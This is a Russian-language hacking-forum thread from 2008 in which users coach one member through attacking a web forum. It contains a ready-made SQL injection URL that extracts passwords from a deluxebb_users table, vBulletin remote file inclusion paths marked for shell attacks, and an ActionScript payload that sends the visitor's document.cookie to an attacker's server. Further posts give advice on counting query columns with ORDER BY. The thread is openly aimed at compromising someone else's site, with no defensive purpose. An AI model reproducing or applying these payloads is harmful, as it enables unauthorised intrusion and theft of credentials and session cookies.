30.05.2008, 15:51
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Вывод не отключен, а как вычислить количество полей во втором запросе ?
|
|
|
30.05.2008, 15:56
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами:
10240166
Репутация:
2097
|
|
Ну а дальше как с простой скулей, подбирай поля при помощи order by
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
30.05.2008, 17:30
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
дык могет форум та не бажный  |
|
|
|
30.05.2008, 17:33
|
|
Новичок
Регистрация: 21.02.2006
Сообщений: 18
С нами:
10639863
Репутация:
1
|
|
Сообщение от Gorev
дык могет форум та не бажный А проверить как как-то можно?
Пытался вручную, но что-то не получается!
Может и правда не бажный!?
Надо искать какую-то альтернативу!
|
|
|
|
30.05.2008, 17:37
|
|
Новичок
Регистрация: 21.02.2006
Сообщений: 18
С нами:
10639863
Репутация:
1
|
|
Так тоже пытался…
Только вот что-то не очень получается…
Или это у меня руки кривые…!?
vBulletin v3.6.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
[site]/vb/includes/functions.php?classfile=[Shell-Attack]
[site]/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
[site]/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]
|
|
|
|
30.05.2008, 17:42
|
|
Banned
Регистрация: 29.05.2008
Сообщений: 116
С нами:
9448043
Репутация:
208
|
|
Сообщение от SeeJay
А проверить как как-то можно?
Пытался вручную, но что-то не получается!
Может и правда не бажный!?
Надо искать какую-то альтернативу!
А саму скулю подставлял:
Код:
misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
Если не работает- стало быть либо пофиксено, либо скуля в сплойте кривая.
|
|
|
|
30.05.2008, 17:45
|
|
Новичок
Регистрация: 21.02.2006
Сообщений: 18
С нами:
10639863
Репутация:
1
|
|
Сообщение от [:|||||:]
А саму скулю подставлял:
Код:
misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
Если не работает- стало быть либо пофиксено, либо скуля в сплойте кривая. Подставлял!
Похоже и правда профиксено!
Ничего нету не ошибки, не информации!
Ребятки подскажите, что еще можно туда вставить!
|
|
|
|
30.05.2008, 18:13
|
|
Новичок
Регистрация: 21.02.2006
Сообщений: 18
С нами:
10639863
Репутация:
1
|
|
И еще вопрос (извините, если замучил)…
Насколько я понимаю данный баг надо впихивать через флешку (swf)??
Код:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
|
|
|
|
30.05.2008, 17:32
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
У меня никогда этот сплойт не работал.
__________________
|
|
|
|
30.05.2008, 18:15
|
|
Banned
Регистрация: 29.05.2008
Сообщений: 116
С нами:
9448043
Репутация:
208
|
|
да, это ActionScript- язык сценариев, иcпользуемый в Flash
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [:|||||:]](/avatars/avatar57317.jpg?710586){kind=avatar}
![Отправить сообщение для [:|||||:] с помощью AIM](fusion/misc/im_aim.gif)
![Отправить сообщение для [:|||||:] с помощью MSN](fusion/misc/im_msn.gif)
![Аватар для [:|||||:]](/avatars/avatar57317.jpg?710641){kind=avatar}
Похожие темы
Комбинированный вид
